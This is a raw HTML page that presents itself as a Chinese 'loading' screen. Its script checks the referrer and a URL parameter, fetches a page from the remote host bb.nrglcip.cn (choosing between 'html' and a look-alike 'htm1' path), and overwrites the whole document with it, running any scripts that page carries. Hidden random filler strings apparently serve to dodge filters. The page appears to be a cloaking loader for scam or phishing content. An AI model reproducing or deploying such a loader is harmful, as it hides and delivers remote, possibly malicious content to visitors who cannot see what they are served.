<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .K9VaRd2sK7 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .K9VaRd2sK7 .Ia4Yr5rV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .K9VaRd2sK7 .content {
            line-height: 50px;
            text-align: center
        }

        .K9VaRd2sK7 .img {
            width: 100%
        }

        .K9VaRd2sK7 .jYyIIFrrCDd {
            text-align: center
        }

        .K9VaRd2sK7 .jYyIIFrrCDd span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .K9VaRd2sK7 .jYyIIFrrCDd span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .K9VaRd2sK7 .jYyIIFrrCDd span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .K9VaRd2sK7 .jYyIIFrrCDd span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .K9VaRd2sK7 .jYyIIFrrCDd span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .K9VaRd2sK7 .jYyIIFrrCDd span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .K9VaRd2sK7 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function cummCsfvsg(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var nmIkpK = cummCsfvsg('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ nmIkpK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ nmIkpK +".html?a=share";
		}
		
        Xy8hmvobK=url+"#"+new Date().getTime();
        Xy8hmvobK && function() {
            $.get(Xy8hmvobK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>vtz2GrQxDsjiJh2z77PTq3lJa5O6O7c0p3vTPB7Y8f1</span>
<p  style='display:none'>MNsB1hpTTTalnJG</p>
<p  style='display:none'>MNsB1hpTTTalnJG</p>
<h1 style='display:none' >jqtGoPgQ5kFp5g066bFJ0cVtvvHnpg7wzHHaYGkgFCQV72wWXdkK8aplqRKpI6wObors59DTDjuxF</h1>
<p  style='display:none'>MNsB1hpTTTalnJG</p>
<ul style='display:none' >egb4U6ULOVmNhvEwPktcD1X0HYxhszY8onp1XfaN1VPtAQLLub8Rp7v0e2RKcgZCS3kwu65d9JzJKBX5ma6F8pZTTPC1QwP1</ul>
<ul style='display:none' >egb4U6ULOVmNhvEwPktcD1X0HYxhszY8onp1XfaN1VPtAQLLub8Rp7v0e2RKcgZCS3kwu65d9JzJKBX5ma6F8pZTTPC1QwP1</ul>
<h1 style='display:none' >jqtGoPgQ5kFp5g066bFJ0cVtvvHnpg7wzHHaYGkgFCQV72wWXdkK8aplqRKpI6wObors59DTDjuxF</h1>
<p  style='display:none'>MNsB1hpTTTalnJG</p><div class="K9VaRd2sK7">
    <div class="Ia4Yr5rV">
        <div class="jYyIIFrrCDd">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >qESOwSiNQOEPoxr9EQx9z9BGQPZnZidVP7tTtXgehwxanfsAIDTA5JftY7XyB2EZooUXJWWVGW2wvkET8mbO0</ul>
<div style='display:none'>GtYeNjq4yV7YrGEaH</div>
<img  src='' style='display:none'>
<div style='display:none'>GtYeNjq4yV7YrGEaH</div>
<li style='display:none' >A2V9JtEO10CsTl22Lh2opVdEq0XJ07XUXg7ftJlhRIabLJwTVhjhJpCkshpsMB6jW</li>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>